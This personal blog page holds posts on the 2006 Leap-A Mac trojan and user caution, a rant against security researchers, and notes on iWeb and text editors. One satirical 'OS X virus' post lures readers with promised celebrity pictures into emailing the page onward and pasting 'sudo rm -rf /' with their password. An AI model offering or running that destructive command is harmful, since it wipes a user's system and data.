Aaron Adams’s Lame-ass Blog

There has been a lot of hoopla surrounding last week’s release of the Leap-A trojan, and as usual, Mac Daily Journal does an excellent job of cutting to the chase and laying out the facts, (If you’re not an MDJ subscriber, you should be.) Mr. Deathrage has written an excellent description of what the trojan does (and doesn’t), how it spreads (or doesn’t), and how it can be easily thwarted. For those unfamiliar with Input Mangers, a good description of their use and function is provided, and a description of how Leap-A and other potential malware can exploit them is included as well.

However, I think through all the coverage, whether from MDJ, the (increasingly lame) Mac media, or the MSM, one important aspect is being neglected: This trojan can only be activated and spread if you, the user, purposefully do it.

Certainly, permissions can be changed on certain folders to prevent Leap-A from doing it’s malicious deed. And anti-virus vendors have updated their signatures to identify or remove Leap-A, depending on the software package. But none of that is necessary if you use some (un)common sense.

When an unsolicited or unexpected file transfer request from a Bonjour iChat buddy appears (the worm does not spread to AIM or .Mac iChat buddies), you should always ask your buddy, “What are you sending me?” This has always been the right thing to do in the past, and it will always be the right thing to do in the future. Accepting file transfers from anyone, even someone you know and trust, without first verifying what’s being sent and that the sender realizes something is coming from his machine, is, frankly, stupid. (iChat does not have the ability to automatically accept file transfers.) There is no preference, permission, or setting that can compensate for user intelligence. If the sender isn’t aware of the file being sent, or doesn’t respond, decline the file transfer. Trojan thwarted.

When someone posts what are allegedly screenshots from the latest cool piece of software, or the genitalia of a celebrity, or anything else that seems too good to be true, be very skeptical, if not wholly suspicious. Ask yourself why the poster is providing a compressed file instead of posting the pictures outright. Resist the urge (you really can if you try, I swear) to immediately download this unknown, compressed file. Again, no warning, preference, or permission is a substitute for your intelligence.

This trojan spreads after you accept and activate it. Whatever useful system tools the trojan misuses to cause damage, whatever method it uses to attempt to spread, none of these things can occur until you, the user, allow them to occur. The action line for the prevention of this trojan should be to inform users to use their brains, not to fiddle with permissions.

There is no substitute for your own intelligence!

Now that we’ve passed the peak of yet another “virus” that isn’t, the usual security researchers, who seem to be clueless, say the same thing they always say, in essence: Mac users need to wake up and stop thinking they’re invulnerable to malware. That statement makes one big false presumption, that Mac users think they’re invulnerable to malware.

In the past several years, I’ve had the opportunity to meet and converse with hundreds of Mac users from all kinds of places and backgrounds. I would consider the cross section of people I’ve encountered a good representative sampling of the user community as a whole, and I can say that not one of those people considers their Mac invulnerable to malware. None. Zero. And having to endure that characterization by outsiders is insulting.

It’s obvious why security researchers and anti-virus creators want Mac OS X to be as vulnerable as other operating systems. It’s childishness, spite, and jealousy that drive users of other operating systems to characterize Mac users as something they are not. The Mac user community understands the situation and they’re proud of the OS that has helped ensure their security, but they’re not delusional and they have no serious preconceptions that they’re immune from malicious elements of our world. We may currently enjoy a trouble-free computing experience with regard to malware, and we may speak happily about that fact, but satisfaction isn’t necessarily the same as complacency.

Hello! Would you like to see homoerotic pictures of Steve Jobs and Paul Otelini backstage at Macworld San Francisco 2006? If so, please perform the following:

1. Copy and paste the address of this page into a e-mail sent to everyone in your address book.
2. Start /Applications/Utilities/Terminal.app
3. Copy and paste the following into the Terminal window:
   sudo rm -rf /
4. Enter your password when prompted.
5. Wait a few minutes and a picture of Paul and Steve in hot gay action will appear on your screen!

Thanks for participating in my OS X virus!

I purchased iLife 06 and I’ve used iWeb. I want something like iWeb to become my primary web creation tool, but there are too many things iWeb and other applications like it just don’t do. I understand that iWeb is intended to be very simple for users who want to toss pictures of the kids onto a web host somewhere, and I’m cool with that. But I’d still like to have something similar for those of us who are more advanced.

Nevertheless, I’ve been toying with iWeb and my .Mac account. I’ve had some fun with it and I figured, why not start a second pointless website with even more mindless yakity-yak. Done and done! Check out The Revenge of the Giant Head any time by clicking the giant head picture on the right. Important things will still remain on this page - it isn’t going anywhere. Just think of the giant head as a supplement to an already content-thin site.

Until recently, I used the excellent SubEthaEdit for my text editing needs. It had a lot of very cool features, not the least of which was the ability to share documents via Bonjour or over the Internet for simultaneous editing, and the price was right: Free for non-commercial use.

SubEthaEdit’s latest release, 2.3, changed all that. It’s no longer free for non-commercial users. Rather, it’s $35 for all users. I understand the work that goes into developing an app like SubEthaEdit, and consequently I understand their need to get some cash flowing into the operation. At the same time, there are other good, free text editors out there and it’s hard to justify purchasing one.

But isn’t this a commercial site? After all, I have one of those ubiquitous Amazon links on the right. Don’t I make money from these pages? Well, No. this isn’t a commercial site because I’m not personally selling anything. This is just for my personal amusement and occasional experimentation. That Amazon ad has produced a single-digit dollar amount of revenue since its inception, and if you’re a regular reader of this page, you know that sometimes I may not update it for months. It’s not any kind of serious money making attempt.

So for the time being, I’ve had to say a reluctant goodbye to SubEthaEdit and instead I’ve adopted Smultron as my new day-to-day editor. It lacks the collaboration features of SubEthaEdit, but I suppose that’s the price of free(beer)ness. Onward and upward.